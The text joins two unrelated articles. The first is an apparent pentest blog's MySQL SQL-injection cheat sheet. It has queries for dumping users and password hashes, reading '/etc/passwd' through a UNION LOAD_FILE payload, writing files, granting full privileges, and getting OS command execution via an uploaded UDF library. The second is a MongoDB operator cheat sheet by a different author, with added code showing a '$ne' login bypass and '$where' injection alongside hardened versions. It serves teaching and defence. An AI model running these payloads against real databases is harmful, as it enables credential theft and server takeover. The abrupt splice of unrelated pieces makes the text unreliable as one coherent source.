Some useful syntax reminders for SQL Injection into MySQL databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet.
The complete list of SQL Injection Cheat Sheets I'm working on is:
I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.
| Purpose | Query |
|:--------|:------|
| Version | SELECT @@version; |
| Comments | SELECT 1; #comment |
| | SELECT /*comment*/1; |
| | SELECT 1; -- comment (MySQL only treats -- as a comment when it is followed by whitespace) |
| Current User | SELECT user(); |
| | SELECT system_user(); |
| List Users | SELECT user FROM mysql.user; -- priv |
| List Password Hashes | SELECT host, user, password FROM mysql.user; -- priv (on MySQL 5.7 and later the hash lives in authentication_string and the password column no longer exists) |
| Password Cracker | John the Ripper will crack MySQL password hashes. |
| List Privileges | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs |
| | SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs |
| | SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas) |
| | SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns |
| List DBA Accounts | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER'; |
| | SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv |
| Current Database | SELECT database(); |
| List Databases | SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0 |
| | SELECT distinct(db) FROM mysql.db; -- priv |
| List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'; |
| List Tables | SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'; |
| Find Tables From Column Name | SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find tables which have a column called 'username' |
| Select Nth Row | SELECT host, user FROM mysql.user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0 |
| | SELECT host, user FROM mysql.user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0 |
| Select Nth Char | SELECT substr('abcd', 3, 1); # returns c |
| Bitwise AND | SELECT 6 & 2; # returns 2 |
| | SELECT 6 & 1; # returns 0 |
| ASCII Value -> Char | SELECT char(65); # returns A |
| Char -> ASCII Value | SELECT ascii('A'); # returns 65 |
| Casting | SELECT cast('1' AS unsigned integer); |
| | SELECT cast('123' AS char); |
| String Concatenation | SELECT CONCAT('A','B'); # returns AB |
| | SELECT CONCAT('A','B','C'); # returns ABC |
| If Statement | SELECT if(1=1,'foo','bar'); -- returns 'foo' |
| Case Statement | SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A |
| Avoiding Quotes | SELECT 0x414243; # returns ABC |
| Time Delay | SELECT BENCHMARK(1000000,MD5('A')); |
| | SELECT SLEEP(5); # >= 5.0.12 |
| Make DNS Requests | Impossible? |
| Command Execution | If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar); on later versions the library must sit in the directory named by @@plugin_dir. The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture, which may or may not be the same as your attack platform. |
| Local File Access | ...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv (FILE), can only read world-readable files; on newer servers @@secure_file_priv restricts where files may be read from or written to |
| | SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system |
| Hostname, IP Address | SELECT @@hostname; |
| Create Users | CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv |
| Delete Users | DROP USER test1; -- priv |
| Make User DBA | GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv |
| Location of DB files | SELECT @@datadir; |
| Default/System Databases | information_schema (>= mysql 5.0), mysql |
Thanks
Jonathan Turner for @@hostname tip.
Tags: cheatsheet, database, mysql, pentest, sqlinjection
Posted in SQL Injection
MongoDB Query Operator Cheat Sheet
Author: orkb
Introduction
The MongoDB document database is a receptive repository for many documents. You want to find results that match your customized search criteria. One main key to accomplishing this task successfully is to use the appropriate query operator. With this MongoDB query operator cheat sheet, you’ll be able to do just that in record time.
Comparison Query Operators
Comparison operators compare a field's value with a value you supply. Note that `$ne` and `$nin` also match documents that lack the field altogether, so they are not simply the inverse of `$eq` and `$in`.

| Name | Description | Usage |
|:-----|:------------|:------|
| `$nin` | Matches documents whose field value is none of the values in the array, or that have no such field. | `db.family.find( { age: { $nin: [ 2, 8 ] } } )` returns every document in the family collection whose age is neither 2 nor 8, plus any document that has no age field. |
| `$ne` | Matches documents whose field value is not equal to the specified value, or that have no such field. | `db.family.find( { gender: { $ne: 'female' } } )` returns every document except those whose gender is female. |
| `$lte` | Matches values less than or equal to the specified value. | `db.family.find( { age: { $lte: 17 } } )` returns documents with an age of 17 or less. |
| `$lt` | Matches values strictly less than the specified value. | `{ <field>: { $lt: <value> } }` |
| `$in` | Matches documents whose field value equals any value in the array. | `{ <field>: { $in: [ <value1>, <value2>, ... <valueN> ] } }` |
| `$eq` | Matches documents whose field value is exactly the specified value. | `{ <field>: { $eq: <value> } }` |
| `$gt` | Matches values strictly greater than the specified value. | `db.family.find( { age: { $gt: 7 } } )` returns documents with an age above 7. |
| `$gte` | Matches values greater than or equal to the specified value. | `{ <field>: { $gte: <value> } }` |
Array Query Operators
Array operators match on the contents of array-valued fields.

| Name | Description | Usage |
|:-----|:------------|:------|
| `$elemMatch` | In a query, matches documents where at least one element of the array field satisfies all of the `$elemMatch` conditions. In a projection, returns only the first array element that matches. | `db.family.find( { gender: "female" }, { child: { $elemMatch: { complexion: "fair" } } } )` selects documents whose gender is female; the projection then returns only the first element of the child array whose complexion is fair. |
| `$all` | Matches documents whose array field contains every element of the specified array, in any order. | `{ <field>: { $all: [ <value1>, <value2>, ... ] } }` |
| `$size` | Matches documents whose array field has exactly the specified number of elements. It takes a single number, not a range. | `db.family.find( { field: { $size: 2 } } )` returns documents whose field array has exactly 2 elements. |
Logical Query Operators
Logical operators combine or negate other query clauses.

| Name | Description | Usage |
|:-----|:------------|:------|
| `$not` | Matches documents whose field does not satisfy the expression, including documents that have no such field. | `db.family.find( { age: { $not: { $gt: 15 } } } )` returns documents whose age is 15 or less, plus documents without an age field. |
| `$nor` | Matches documents that fail every expression in the array. | `{ $nor: [ { <expression1> }, { <expression2> }, ... { <expressionN> } ] }` |
| `$and` | Matches documents that satisfy every clause in the array. A document that matches one clause but not another is not returned. | `db.family.find( { $and: [ { age: { $ne: 5 } }, { age: { $exists: true } } ] } )` returns documents that have an age field whose value is not 5. |
| `$or` | Matches documents that satisfy at least one clause in the array. | `db.family.find( { $or: [ { age: { $lt: 7 } }, { complexion: 'fair' } ] } )` returns documents whose age is below 7 or whose complexion is fair, or both. |
Evaluation Query Operators
| Name | Description | Usage |
|:-----|:------------|:------|
| `$where` | Matches documents for which a JavaScript expression or function returns true; the server runs the JavaScript with `this` bound to each document. | `db.family.find( { $where: function() { return (this.name.first == 'Yeshua') } } ).pretty()` returns documents whose first name is Yeshua. |
| `$regex` | Matches documents whose string field matches the regular expression. | `db.family.find( { 'name.first': { $regex: 'R.*' } } )` returns documents whose first name contains an R; anchor the pattern (`'^R'`) to require that the name starts with R. |
| `$expr` | Allows aggregation expressions inside the query language, for example comparing two fields of the same document. | `db.articleMonthly.find( { $expr: { $gt: [ '$articleFinished', '$articleQuota' ] } } )` returns documents where the number of finished articles exceeds the monthly quota. |
| `$text` | Runs a text search against the fields covered by the collection's text index. | See the syntax below. |
| `$mod` | Matches documents where the field value divided by the divisor leaves the specified remainder. | `db.family.find( { age: { $mod: [ 7, 0 ] } } )` returns documents whose age is a multiple of 7. |

`$where` cannot use indexes and runs server-side JavaScript, so never assemble its string from untrusted input: a value such as `' || '1'=='1` turns the comparison into an expression that is true for every document. Use `$eq`, or `$regex` with a parameterised value, instead.

The `$text` syntax is:

```
{
  $text: {
    $search: <string>,
    $language: <string>,
    $caseSensitive: <boolean>,
    $diacriticSensitive: <boolean>
  }
}
```

- `$search` is the string to look up in the text index.
- `$language` is optional. It selects the stop-word list and stemmer for the search; `"none"` disables stop words and stemming.
- `$caseSensitive` is an optional boolean flag that enables or disables case sensitivity. The default is false, that is, the search ignores case.
- `$diacriticSensitive` is an optional boolean flag for version 3 text indexes that enables or disables sensitivity to diacritic marks. The default is false; earlier text index versions are always diacritic insensitive.

`$mod` takes an array of `[ divisor, remainder ]`. Starting with version 2.6 it raises an error if the array has fewer or more than two elements; earlier versions did not error on a malformed array. In the example above the divisor is 7 and the required remainder is 0.
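The comparison, array, logical and evaluation operators above are easiest to reason about when you can run them. The block below is an added example, not part of the original cheat sheet: a small in-memory evaluator for those operators over a constructed `family` collection, used to show the point the cheat sheet only implies. When an application forwards client-supplied JSON straight into `find()`, the client can supply operators such as `$ne` itself, and a `$where` string assembled by concatenation is JavaScript injection. The `accounts` collection, the `login` handlers and the sample documents are all constructed for the example; the operator semantics follow the MongoDB documentation, but this is a teaching subset, not the server's matcher.

```javascript
// Added example, not part of the original cheat sheet: an in-memory evaluator for
// the documented query operators, plus the two injection cases it makes visible.

const family = [ // constructed sample documents
  { name: { first: 'Yeshua' }, age: 33, gender: 'male',   complexion: 'fair' },
  { name: { first: 'Ruth' },   age: 8,  gender: 'female', complexion: 'olive' },
  { name: { first: 'Rachel' }, age: 14, gender: 'female', complexion: 'fair',
    child: [ { complexion: 'dark' }, { complexion: 'fair' } ] },
  { name: { first: 'Eli' },    gender: 'male' },            // no age field
];

// Resolve a dotted path such as 'name.first'; undefined when any step is missing.
const getPath = (doc, path) =>
  path.split('.').reduce((o, k) => (o == null ? undefined : o[k]), doc);

// An operator object is a plain object with at least one '$'-prefixed key.
const isOpObject = (v) => v !== null && typeof v === 'object' &&
  !Array.isArray(v) && Object.keys(v).some((k) => k.startsWith('$'));

// Does one field value satisfy an operator object such as { $gt: 7, $ne: 9 }?
function matchOps(value, ops) {
  return Object.entries(ops).every(([op, arg]) => {
    switch (op) {
      case '$eq':  return value === arg;
      case '$ne':  return value !== arg;                 // true for a missing field too
      case '$gt':  return value !== undefined && value > arg;
      case '$gte': return value !== undefined && value >= arg;
      case '$lt':  return value !== undefined && value < arg;
      case '$lte': return value !== undefined && value <= arg;
      case '$in':  return arg.includes(value);
      case '$nin': return !arg.includes(value);          // true for a missing field too
      case '$exists': return (value !== undefined) === arg;
      case '$not': return !matchOps(value, arg);
      case '$regex': return typeof value === 'string' && new RegExp(arg).test(value);
      case '$all':  return Array.isArray(value) && arg.every((a) => value.includes(a));
      case '$size': return Array.isArray(value) && value.length === arg;
      case '$mod':  return typeof value === 'number' && value % arg[0] === arg[1];
      case '$elemMatch': return Array.isArray(value) && value.some((e) => matches(e, arg));
      default: throw new Error('unsupported operator ' + op);
    }
  });
}

// Does a document satisfy a whole query object?
function matches(doc, query) {
  return Object.entries(query).every(([key, cond]) => {
    if (key === '$and') return cond.every((q) => matches(doc, q));
    if (key === '$or')  return cond.some((q) => matches(doc, q));
    if (key === '$nor') return !cond.some((q) => matches(doc, q));
    // $where: evaluated as JavaScript with `this` bound to the document, as the server does.
    if (key === '$where') return Boolean(new Function('return (' + cond + ')').call(doc));
    const value = getPath(doc, key);
    return isOpObject(cond) ? matchOps(value, cond) : value === cond;
  });
}

const find = (coll, query) => coll.filter((d) => matches(d, query));
const firstNames = (docs) => docs.map((d) => d.name.first);

// 1. Operator injection. The handler expects { user, pass } strings but forwards
// whatever JSON arrives, so { pass: { $ne: '' } } matches any stored password.
const accounts = [ { user: 'admin', pass: 'correct horse' } ]; // constructed
function login(body) {
  return find(accounts, { user: body.user, pass: body.pass }).length > 0;
}
// Hardened: only plain strings reach the query, so no operator can be smuggled in.
function asPlainString(v) {
  if (typeof v !== 'string') throw new TypeError('credential must be a string');
  return v;
}
function loginSafe(body) {
  return login({ user: asPlainString(body.user), pass: asPlainString(body.pass) });
}

// 2. A $where string built from user input is JavaScript injection; $eq is not.
function findByFirstNameWhere(input) {
  return find(family, { $where: `this.name.first == '${input}'` });
}
function findByFirstNameEq(input) {
  return find(family, { 'name.first': { $eq: input } });
}

// Usage: the cheat sheet's $nin example, then both injections side by side.
console.log(firstNames(find(family, { age: { $nin: [ 2, 8 ] } })));
console.log(login({ user: 'admin', pass: { $ne: '' } }), findByFirstNameWhere("' || '1'=='1").length);
```

The `$ne`/`$nin` branches return true for a missing field on purpose, matching the behaviour described in the comparison table, which is exactly why an injected `{ $ne: '' }` matches every account. The fix is structural, not a blocklist: validate the type of each credential before it becomes part of a query document.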
Element Query Operators
Element operators test for the presence or type of a field rather than its value.

| Name | Description | Usage |
|:-----|:------------|:------|
| `$exists` | With `true`, matches documents that contain the field (even when its value is null); with `false`, matches documents that do not. | `db.family.find( { age: { $exists: true, $nin: [ 3, 21 ] } } )` returns documents that have an age field whose value is neither 3 nor 21. |
| `$type` | Matches documents whose field value is of the specified BSON type. Given an array of types, it matches any of them. | `{ <field>: { $type: [ <BSON type1>, <BSON type2>, ... ] } }` |
Conclusion
The MongoDB database query operator cheat sheet is an excellent resource for beginners and experts alike. It contains comparison, array, logical, evaluation, element and more commonly used query operators. Refer to it often. Think of the cheat sheet as your helpmate for efficient coding in all of your MongoDB projects.